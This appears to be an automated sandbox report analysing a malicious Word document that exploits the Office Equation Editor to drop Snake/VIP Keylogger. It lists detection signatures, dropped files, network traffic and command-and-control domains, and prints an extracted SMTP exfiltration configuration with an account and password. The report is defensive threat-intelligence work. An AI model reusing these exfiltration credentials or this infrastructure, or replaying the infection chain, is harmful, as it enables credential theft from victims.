Windows Analysis Report
0225139776.docx.doc

Overview

General Information

Sample name: 0225139776.docx.doc
Analysis ID: 1520577
MD5: f25ef2223bc81c701a2e40dc952d4d0d
SHA1: 5fb9f3c608bc44ec4c169e51f18409a93245e8fe
SHA256: 7e00eaee75fe1d2f2b49ebf83b5c9043f2b4143e8cc87e17ef4a440cc67e604f
Tags: docuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains an external reference to another file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe Avira: detection malicious, Label: HEUR/AGEN.1309880
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Avira: detection malicious, Label: HEUR/AGEN.1309880
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Found malware configuration
Source: 10.2.millitingacy20306.exe.3249300.3.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "millilog@mobiloilandgas.top", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "25"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: 0225139776.docx.doc ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org

Exploits
barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 66.63.187.123 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe Jump to behavior
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DEB89h 13_2_003DE8A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D9743h 13_2_003D9330
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D767Dh 13_2_003D7490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D8007h 13_2_003D7490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D9181h 13_2_003D8EC2
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 13_2_003D7035
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DF4B9h 13_2_003DF1D9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DE6F1h 13_2_003DE325
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DFDE9h 13_2_003DFB08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DF021h 13_2_003DED40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DF951h 13_2_003DF670
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D9743h 13_2_003D9672
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006198CAh 13_2_006195D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006185AAh 13_2_006182B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613A09h 13_2_00613760
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061A25Ah 13_2_00619F60
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00612339h 13_2_00612068
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061CD62h 13_2_0061CA68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00610C41h 13_2_00610970
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00617A41h 13_2_00617770
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061F86Ah 13_2_0061F570
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00616349h 13_2_00616078
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00618A72h 13_2_00618778
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00610311h 13_2_00610040
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00617111h 13_2_00616E40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00618F3Ah 13_2_00618C40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00615A19h 13_2_00615748
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061BA42h 13_2_0061B748
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00614321h 13_2_00614050
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061E54Ah 13_2_0061E250
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061A722h 13_2_0061A428
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613101h 13_2_00612E30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061D22Ah 13_2_0061CF30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00611A09h 13_2_00611738
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061FD32h 13_2_0061FA38
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006127D1h 13_2_00612500
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006110D9h 13_2_00610E08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00617F7Ah 13_2_00617C08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00619402h 13_2_00619108
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006167E2h 13_2_00616510
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061BF0Ah 13_2_0061BC10
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006150E9h 13_2_00614E18
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061EA12h 13_2_0061E718
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00615EB1h 13_2_00615BE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061EEDAh 13_2_0061EBE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006147B9h 13_2_006144E8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061ABEAh 13_2_0061A8F0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061D6F2h 13_2_0061D3F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061DBBAh 13_2_0061D8C0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613599h 13_2_006132C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00611EA1h 13_2_00611BD0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006107A9h 13_2_006104D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006175A9h 13_2_006172D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061C3D2h 13_2_0061C0D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00611571h 13_2_006112A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061C89Ah 13_2_0061C5A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00616C79h 13_2_006169A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061F3A2h 13_2_0061F0A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00615581h 13_2_006152B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613E89h 13_2_00613BB8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061B0B2h 13_2_0061ADB8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00614C51h 13_2_00614980
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061B57Ah 13_2_0061B280
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061E082h 13_2_0061DD88
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00612C69h 13_2_00612998
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00619D92h 13_2_00619A98
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073033Ah 13_2_00730040
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00731B22h 13_2_00731828
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073330Ah 13_2_00733010
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00731FEAh 13_2_00731CF0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 007337D2h 13_2_007334D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00731192h 13_2_00730E98
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073297Ah 13_2_00732680
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073165Ah 13_2_00731360
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00732E42h 13_2_00732B48
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00730802h 13_2_00730508
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00730CCAh 13_2_007309D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 007324B3h 13_2_007321B8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00733C9Ah 13_2_007339A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B6B91h 13_2_008B68E8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B5A31h 13_2_008B5788
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BE1C5h 13_2_008BDE88
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BD429h 13_2_008BD180
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B4D29h 13_2_008B4A80
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B7441h 13_2_008B7198
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B6739h 13_2_008B6490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BF579h 13_2_008BF2A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B8E51h 13_2_008B8BA8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B8149h 13_2_008B7EA0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B9B59h 13_2_008B98B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B3771h 13_2_008B34C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BBE71h 13_2_008BBBC8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BB169h 13_2_008BAEC0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B5181h 13_2_008B4ED8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BD881h 13_2_008BD5D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BCB7Bh 13_2_008BC8D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B4479h 13_2_008B41D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B5E89h 13_2_008B5BE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BE7B1h 13_2_008BE4E0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B85A1h 13_2_008B82F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B7899h 13_2_008B75F0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B92A9h 13_2_008B9000
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BB5C1h 13_2_008BB318
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BF0E1h 13_2_008BEE10
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BCFD1h 13_2_008BCD28
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B48D1h 13_2_008B4628
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BC2C9h 13_2_008BC020
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B3BC9h 13_2_008B3920
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B62E1h 13_2_008B6038
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B55D9h 13_2_008B5330
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BDCD9h 13_2_008BDA30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B7CF1h 13_2_008B7A48
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BFA11h 13_2_008BF740
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B6FE9h 13_2_008B6D40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B9701h 13_2_008B9458
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B89F9h 13_2_008B8750
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BAD11h 13_2_008BAA68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B4021h 13_2_008B3D78
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BC721h 13_2_008BC478
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BEC49h 13_2_008BE978
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BBA19h 13_2_008BB770
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B3319h 13_2_008B3070
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C55F38
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C52AF9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C52B00
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C55F28
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: api.telegram.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
